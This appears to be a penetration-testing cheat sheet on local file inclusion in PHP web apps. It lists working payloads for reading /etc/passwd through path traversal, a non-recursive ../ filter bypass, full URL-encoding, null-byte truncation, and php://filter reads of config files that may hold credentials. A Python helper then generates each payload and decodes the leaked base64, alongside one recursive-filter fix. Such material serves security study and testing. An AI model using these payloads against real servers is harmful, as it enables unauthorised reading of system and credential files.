LFI

LFI techniques

Basic LFI

  • Basic: /index.php?path=/etc/passwd

  • Path traversal: /index.php?path=../../../../etc/passwd

  • Name prefix (the app prepends a fixed directory to our input, e.g. /etc/ + input): /index.php?path=/../../../etc/passwd (the leading slash is harmless because the prefix is only string-concatenated; ../../../etc/passwd works too)

  • Approved path (the app only accepts input that starts with some expected directory, e.g. ./languages/, and errors otherwise): /index.php?path=./directories_above/../../../../etc/passwd

More advanced LFI

  • Nonrecursive ../ filter (the filter strips ../ only once, so ....// becomes ../ after stripping): /index.php?path=....//....//....//....//etc/passwd

  • URL-encode the payload (for filters that look for ../ in the raw query string before the server decodes it): /index.php?path=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

  • If the webserver appends .php to our input

    • Using a null byte to terminate the string (obsolete: only works on PHP before 5.3.4, which fixed null bytes in include paths): /index.php?path=../../../../etc/passwd%00

    • Read PHP files as source instead of executing them (maybe some login code or a config file that has credentials):

      1. /index.php?path=php://filter/read=convert.base64-encode/resource=webconfig (webconfig turns into webconfig.php, and the filter base64-encodes the file rather than running it)

      2. Take ALL of the base64 that is shown on the page and run echo "<base64>" | base64 -d
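The bypass variants in this section are mechanical, so here is an added Python helper set (written for this page, not taken from any tool) that produces each payload, models the weak non-recursive filter next to a correct one, and pulls the base64 blob out of a php://filter response and decodes it. The sample response body and the embedded base64 are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample: what a php://filter/read=convert.base64-encode response
# looks like once the blob is wrapped in the page's HTML. The base64 decodes to
# a made-up config file; it is not real output from any target.
SAMPLE_RESPONSE = "<html><body>PD9waHAKJHBhc3MgPSAnaHVudGVyMic7Cg==</body></html>"


def nonrecursive_strip(s: str) -> str:
    """Model of the weak filter: removes '../' exactly once."""
    return s.replace("../", "")


def recursive_strip(s: str) -> str:
    """The fix: keep stripping until nothing changes, so '....//' cannot survive."""
    while "../" in s:
        s = s.replace("../", "")
    return s


def doubled_traversal(depth: int, target: str = "etc/passwd") -> str:
    """'....//' collapses to '../' after one non-recursive strip."""
    return "....//" * depth + target


def url_encoded(payload: str) -> str:
    """Percent-encode every byte, including '/' and '.', like the example above."""
    return "".join("%%%02x" % b for b in payload.encode())


def null_byte(payload: str) -> str:
    """Legacy truncation of an appended '.php' (PHP < 5.3.4 only)."""
    return payload + "%00"


def php_filter_source(resource: str) -> str:
    """Wrapper that base64-encodes the target file instead of executing it;
    the app's appended '.php' is added to the resource name by the server."""
    return "php://filter/read=convert.base64-encode/resource=" + resource


def decode_filter_output(page_body: str) -> bytes:
    """Extract the base64 run from the response and decode it.

    The filter emits one unbroken run, so grab the longest base64-looking
    sequence; the length floor keeps ordinary words in the HTML from matching.
    """
    runs = re.findall(r"[A-Za-z0-9+/=]{20,}", page_body)
    if not runs:
        raise ValueError("no base64 run found in response")
    return base64.b64decode(max(runs, key=len))


if __name__ == "__main__":
    p = doubled_traversal(4)
    print(p, "->", nonrecursive_strip(p), "| fixed:", recursive_strip(p))
    print(url_encoded("../../../../etc/passwd"))
    print(php_filter_source("webconfig"))
    print(decode_filter_output(SAMPLE_RESPONSE).decode())
```

`url_encoded` reproduces the exact string from the URL-encoding bullet, and `unquote` on that string gives back `../../../../etc/passwd`, which is the form the include call actually sees.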
